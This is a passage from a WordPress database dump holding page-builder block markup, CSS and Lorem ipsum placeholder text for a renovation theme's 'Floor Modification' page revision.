padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"f462a815-3afa-46a4-ac0d-a7a793634e6f\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f462a815-3afa-46a4-ac0d-a7a793634e6f {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-f462a815-3afa-46a4-ac0d-a7a793634e6f\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"b9e2c4a9-1c52-4afa-b8d3-2786848330e8\"} -->\n<style type=\"text/css\"> .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-b9e2c4a9-1c52-4afa-b8d3-2786848330e8 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"55eab42a-171d-4004-b4bc-0a2e3ae6c023\"} -->\n<style type=\"text/css\"> .block-55eab42a-171d-4004-b4bc-0a2e3ae6c023 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-55eab42a-171d-4004-b4bc-0a2e3ae6c023 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-55eab42a-171d-4004-b4bc-0a2e3ae6c023 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-55eab42a-171d-4004-b4bc-0a2e3ae6c023 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-55eab42a-171d-4004-b4bc-0a2e3ae6c023 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-55eab42a-171d-4004-b4bc-0a2e3ae6c023\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"906f82ed-d989-48d3-8d4a-dec354cfd0eb\"} -->\n<style type=\"text/css\"> .block-id-906f82ed-d989-48d3-8d4a-dec354cfd0eb .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-906f82ed-d989-48d3-8d4a-dec354cfd0eb .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-906f82ed-d989-48d3-8d4a-dec354cfd0eb .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-906f82ed-d989-48d3-8d4a-dec354cfd0eb is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"038531d9-93b1-4e10-a31f-28e3ca7e1fa4\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-038531d9-93b1-4e10-a31f-28e3ca7e1fa4\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"7508fb32-62c4-4394-8e6e-939c1d03ed82\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-7508fb32-62c4-4394-8e6e-939c1d03ed82 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7508fb32-62c4-4394-8e6e-939c1d03ed82.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ca899d52-7d25-4abf-9783-1c37f4d090a7\"} -->\n<style type=\"text/css\"> .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ca899d52-7d25-4abf-9783-1c37f4d090a7 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ca899d52-7d25-4abf-9783-1c37f4d090a7 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"7e040cc2-afee-48b5-a54d-3bfb6b2115a4\"} -->\n<style type=\"text/css\"> .block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7e040cc2-afee-48b5-a54d-3bfb6b2115a4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"bfae748d-f0cd-4af0-a2f7-13be4a8e7f70\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bfae748d-f0cd-4af0-a2f7-13be4a8e7f70\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Floor Modification','','inherit','closed','closed','','263-revision-v1','','','2021-05-28 05:44:11','2021-05-28 05:44:11','',263,'https://cteisys.com/?p=346',0,'revision','',0),(269,1,'2021-05-28 05:45:24','2021-05-28 05:45:24','<!-- wp:skt-blocks/section 